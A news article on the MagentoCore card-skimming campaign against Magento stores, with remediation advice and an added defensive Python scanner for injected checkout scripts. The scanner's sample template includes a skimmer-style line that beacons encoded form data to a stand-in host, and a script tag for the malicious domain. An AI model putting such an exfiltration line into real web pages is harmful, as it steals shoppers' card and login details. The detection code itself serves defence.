“MagentoCore” Malware Infects Thousands of E-Commerce Websites Worldwide


It has been revealed that thousands of e-commerce stores across the globe have been running, though unwittingly, a dangerous malware that skims payment details. Reports suggest that this malware, which has been stealing payment details of thousands of users worldwide, has been infecting as many as 50 new stores each day.

Willem de Groot, a prominent Dutch security blogger and researcher, uncovered the infection; he named the malware ‘MagentoCore’ because it infects the popular e-commerce software Magento.

In a post on his blog, Willem de Groot writes: “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

He adds, “The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.”

Based on his daily scans, de Groot reports that new brands were being hijacked at a pace of 50 to 60 stores per day over the two weeks immediately preceding his blog post (dated August 31, 2018). He also points out that although the hackers have targeted multi-million dollar publicly traded companies, it is the customers who are the real victims, since it is their card details and identities that get stolen and potentially misused.

The MagentoCore malware mostly infects an e-commerce website through brute-force techniques, for example automatically trying large numbers of passwords, sometimes for months. Once this succeeds, a piece of JavaScript is embedded in the website’s HTML template, after which all keystrokes from customers on the website are recorded. The recorded data is sent in real time to the hackers’ main server, which, according to de Groot, is “registered in Moscow”. Thus all personal details about customers (usernames, passwords, credit card data and so on) are stolen.

Willem de Groot adds, “The malware includes a recovery mechanism as well. In case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.”

How to deal with an infection…

Any e-commerce store that has detected the presence of a skimmer should focus on doing the following things, as per Willem de Groot:

  • Finding out how the hackers gained entry into the system. It needs to be determined whether any staff computer is infected; this can be done by analyzing back-end logs and correlating them with staff IPs and working hours. Any suspicious activity could help identify the infected system or the session the hacker hijacked.
  • Finding the backdoors and unauthorized changes in the store’s codebase.
  • Closing or blocking all the means that the hackers have used for unauthorized access.
  • Removing the skimmer, backdoors and other malicious code and then reverting to a certified safe copy of the codebase, if possible. (Willem de Groot says, “Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.”)
  • Implementing strong security procedures to prevent future infections.

E-commerce companies that don’t have much experience with forensic analysis can also hire the services of a professional.
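The two checks de Groot recommends above (finding unauthorized changes in the codebase, and checking every HTML/JS asset loaded during checkout for injected script) can be automated. The following is an added example, not code from the article or from de Groot; it assumes a baseline manifest taken from a known-good copy of the store, an allow-list of hosts the store legitimately loads scripts from (the `.test` hosts are constructed placeholders), and uses magentocore.net, the domain named in the article, as the known indicator.

```python
import hashlib
import re
from pathlib import Path
# Hosts the store legitimately loads scripts from (constructed allow-list; tune per store).
ALLOWED_HOSTS = {"cdn.example-store.test", "js.example-psp.test"}
# Indicator named in the article: the skimmer was served from magentocore.net.
KNOWN_BAD_HOSTS = {"magentocore.net"}
# Captures the host of any absolute or scheme-relative URL found in HTML/JS text.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)

def host_in(host, hosts):
    # True if host equals, or is a subdomain of, any entry in hosts.
    return any(host == h or host.endswith("." + h) for h in hosts)

def classify_hosts(text):
    """Split the external hosts referenced by one asset into known-bad and unexpected."""
    hosts = {h.lower() for h in HOST_RE.findall(text)}
    return {
        "known_bad": sorted(h for h in hosts if host_in(h, KNOWN_BAD_HOSTS)),
        "unexpected": sorted(h for h in hosts if not host_in(h, KNOWN_BAD_HOSTS) and not host_in(h, ALLOWED_HOSTS)),
    }

def scan_assets(root):
    """Report every HTML/JS asset under root that references a non-allow-listed host."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".phtml", ".js"}:
            result = classify_hosts(path.read_text(errors="replace"))
            if result["known_bad"] or result["unexpected"]:
                findings[str(path.relative_to(root))] = result
    return findings

def build_manifest(root):
    """Map each file under root to its SHA-256 so it can be compared with a known-good copy."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in Path(root).rglob("*") if p.is_file()}

def compare_manifests(current, baseline):
    """Files added, modified or missing relative to the baseline (a changed cron.php shows up here)."""
    return {
        "added": sorted(k for k in current if k not in baseline),
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
    }

# Constructed sample checkout template: one allow-listed, one known-bad and one unknown host.
SAMPLE_TEMPLATE = """<script src="https://cdn.example-store.test/js/checkout.js"></script>
<script src="//magentocore.net/placeholder.js"></script>
<script>var i=new Image();i.src='http://collect.unknown-host.test/c?d='+btoa(f);</script>"""
```

Run `scan_assets` over the live web root and `compare_manifests(build_manifest(live_root), baseline)` against the manifest of the certified safe copy; anything in "unexpected", "added" or "modified" is where to start the manual review.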

Strong passwords, regular patching help prevent infection

Strong passwords, effective password management and regular patching go a long way towards preventing infection. This applies not just to the ‘MagentoCore’ malware but to malware infections in general.

Passwords need to be strong, with a mix of capital and small letters, numbers and non-alphanumerical characters. The passwords need to be changed regularly as well.

E-commerce businesses must have a stringent patching schedule, with patching done at least once a week. The patching frequency needs to increase for any business operating active online environments such as e-commerce stores.

Remember that cybercriminals are always on the lookout for unpatched websites that may contain security vulnerabilities.
